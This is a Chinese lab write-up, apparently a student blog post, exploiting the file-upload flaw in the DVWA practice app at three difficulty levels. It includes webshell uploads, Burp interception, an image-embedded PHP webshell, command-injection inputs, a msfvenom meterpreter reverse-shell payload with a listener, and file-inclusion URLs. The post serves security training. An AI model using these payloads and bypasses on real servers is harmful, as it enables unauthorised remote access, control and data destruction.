cmd 查看文件权限_学员投稿 | DVWA1.9之文件上传

文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。

文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知

本人测试的靶场是通过centos7系统用docker-compose来搭建的一个全能靶场,靶场环境不一样,用的工具也不一定能连上,希望大家请理解一下,谢谢

48022c8ca71510106921169a978655c9.png

LOW级别漏洞利用

1、编辑一句话木马q.php

21c262821219046cc4712dfae58c24c0.png

2、上传

37165679272b0da22a7ec7ef165f5b36.png

3、用菜刀连接

指定连接目录为http://192.168.5.199/hackable/uploads/q.php,参数为cmd,类型为PHP(eval)

06b1bd7bb0e25e977699a4fef2b25f0d.png

4、双击新添加的条目

0a21d03fc10314c7c1c5e3e9f6cc2863.png

5、获取目标站点目录访问权限

0e1fe3c805436a6fbb27ee7634652d62.png

Medium级别

Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型(Content-Type)必须是jpeg或者png,大小不能超过100000B(约为97.6KB)

首先抓包修改文件类型

一句话木马不受大小限制影响

1、将上面Low等级的q.php更名为w.png(这里说一下可以改jpeg或者png)

2、上传w.png,并开启抓包

70122fdde0702e190a11d8837913a95f.png

5fa48ecaca79198db7455a6ac4d23141.png

3、修改上传文件后缀名(把w.png改为w.php)然后点击放包按钮(Forward)上传

5ad7f45d7f7906c3d59b91b3b38c9318.png

4、上传成功

b31434c868d95294e7fe0008585c86df.png

5、用菜刀连接

指定连接目录http://192.168.5.199/hackable/uploads/w.php,参数为cmd,类型为PHP(eval)

f48ba81e21d226ed1a5361c6c432fade.png

High级别

High级别的代码读取文件名中最后一个.后的字符串(文件后缀名),期望通过文件名来限制文件类型,因此要求上传文件名形式必须是*.jpg、*.jpeg 、*.png之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型

什么是文件头

文件头是位于文件开头的一段承担一定任务的数据,一般都在开头的部分

文件头就是为了描述一个文件的一些重要的属性,文件头告诉了打开并处理该文件的程序这些属性

常见文件的文件头(16进制):

JPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638HTML (html),文件头:68746D6C3EMS Word/Excel (xls.or.doc),文件头:D0CF11E0Quicken (qdf),文件头:AC9EBD8FZIP Archive (zip),文件头:504B0304RAR Archive (rar),文件头:52617221可执行文件(EXE),文件头:MZ

这里有几种方法,我一一举例说明

第一种:将木马隐藏在图片中绕过(High文件上传+Low命令注入)

1、首先把medium使用的图片木马w.png更改为c.php

并使用copy命令将木马文件c.php与图片文件e.png合并为t.png

094d607707d0411c1ba7cfe6cbb00b57.pngaf3dedc5ec2d3847a724328d99ebcb9e.png

 d69c8d4149f0179746371b9ade562d09.png

Copy e.png/b+c.php/a t.png

可以看到,一句话木马被添加到图片的尾部

ac455ee31cd07079fd42857ab1e4a6ce.png

2、上传成功

09415b0aac2363085cfef696d5027d77.png

3、选择命令注入(Command Injection)

a91c1362f1aa3f0d521b749ed1b66bee.png

4、用命令注入方式来查看该目录

127.0.0.1|ls ../../hackable/uploads

980d378f65844bee620325f7a09b68f4.png

8f07329a3ef7acd655857ddfefa97369.png

5、然后通过命令注入方式输入以下命令来进行更改文件后缀

127.0.0.1|mv ../../hackable/uploads/t.png ../../hackable/uploads/t.php

885d07b34098218c0560deb743fbcccd.png

6、然后就直接上菜刀

(由于路由器关了一次,这里的IP地址更改了,这里不用担心,操作跟前面Low等级的一样)

指定连接目录http://192.168.5.129/hackable/uploads/t.php,参数为cmd,类型为PHP(eval)

4187de3ae1eca52445255e28d1ed2eae.png

第二种:用msfvenom生成的以php代码的图片木马中加入GIF89a;图片欺诈头部绕过(High文件上传+Low文件包含)

(在Kali上进行测试)

1、首先用msfvenom生成一个PHP语言的PNG图片木马

31d35a428756b085d292b81fb9d53f7a.png

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.5.214 lport=3333 >> any.png

2、上传图片木马

88c2eed181663454dc7e196f00f79adc.png

3、上传失败

f6fe69f702a589c7ceb32422f10af6c6.png

出错的英文提示是:您的图像未上载,我们只能接受JPEG或PNG图像。

4、然后我们用VIM编辑器(这里没限定编辑器)在sam.png图片木马头部加一个代码GIF89a;

6c3ad4eaf05a657e3a1d9b4676386b43.png

5、再次成功上传图片马

f51a4f6207d91a36f879003d6df21436.png

6、在终端输入msfconsole进入控制台

ac6c9cbcd2e70df909a6a0f3777c5906.png

7、然后输入以下命令

4eaa3adf1722f8c3f9c4dd52fc68e2c6.png

use exploit/multi/handlerset payload php/meterpreter/reverse_tcpset lport 3333set lhost 192.168.5.214exploit

8、然后选择Low等级的文件包含

b4a64710902f497ece6472ad4d8bcc2a.png

b9ea9761aa08f5b6eeb56ee9053ed425.png

9、在地址栏输入以下的地址并回车

192.168.5.129/vulnerabilities/fi/?page=../../hackable/uploads/any.png

3ea3b23bc47383cee23ab71ca7ca2ae1.png

10、msfconsole控制台就有生成一条会话

0e1f4eea1c15b4feac4d28915b5825bc.png

11、然后我们通过命令查看一下/hackable/uploads这个目录下有什么文件

b26010cfb0a0b432470484c2864c3cb9.png

12、然后我测试一下,随便删除一个文件试试,看看有没有权限,测试成功了

944cfbb686fc5d68e22c90ffb9f3fe6d.png

第三种:将木马隐藏在图片中绕过(High文件上传+Low等级文件包含)

1、先用一个txt文本,输入GIF89a;图片欺诈头部和一句话PHP木马,然后更改后缀名为00.jpg

16e3fd0bf9341d9132a9544e731c4788.png

2、上传文件00.jpg

667f4ab1c4dc1dec91512c904ad36ecf.png

3732fda24c3e466924d0ab1fb88d17bb.png

3、更改安全级别为Low

dc5c74aff55d4d9a8e0c1e6d059e0769.png

4、选择文件包含,并在地址栏输入,但先别按回车!!!!

http://192.168.5.129/vulnerabilities/fi/?page=../../hackable/uploads/00.jpg

5f71d3339099b631082ac47bd2f6b72f.png

5、打开burpsuite进行抓包,这里要注意一下,点击开启抓包按钮先不要急着关闭!!!

bc1d48dfcf123c26d33d72dc348de10d.png

把Cookie这一行复制下来

6、打开菜刀

指定连接目录http://192.168.5.129/vulnerabilities/fi/?page=../../hackable/uploads/00.jpg参数为cmd,类型为PHP(eval),字符编码为GB2312

f3591467ce4cb348e82dffda0257a839.png

7、在菜刀的其他空白地方按鼠标右键,点击设置

3a7a87fc685641bd3f4f6e574fa6dabf.png

8、设置请求头,把刚刚在burpsuite抓包出现的Cookie值复制进去,按照图中的数字顺序进行操作

a7e463cc7b9c2410a306067f36b7aa2e.png

9、双击新添加的条目

b247c8a35fc1cd00d9914da3400ceff8.png

10、获取目标站点目录访问权限

3f840887d76378912356c8b4349f293a.png

11、发现刚上传的00.jpg文件在里面,然后测试一下是否有权限删除文件,我随便删除一个文件进行测试,成功了

1669c43679cac47238f3e65e0b4dbfff.png 

94880cc920e22d9f13f1b80927cd3d0b.png

以上就是这次的所有分享东塔小姐姐忍不住要夸夸我们优秀的学员宝宝同时也很开心东塔安全学院能够提供平台给大家施展自己的才华和知识欢迎大家踊跃投稿内容可以是技术类文章、干货、小白入门...也可以说说你和东塔安全学院的故事或是其他任何你想分享的有益的内容只要你来,东塔小姐姐马上安排你C位出道 d9e651d13b1fd7e2313bab531a9c9c73.png

-免费获取学习资料

电子书籍、试听课程-

782589e0448655259625b352d1f509ef.gif

edd8df6f0a06300c14fc3c5d28c74c0f.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值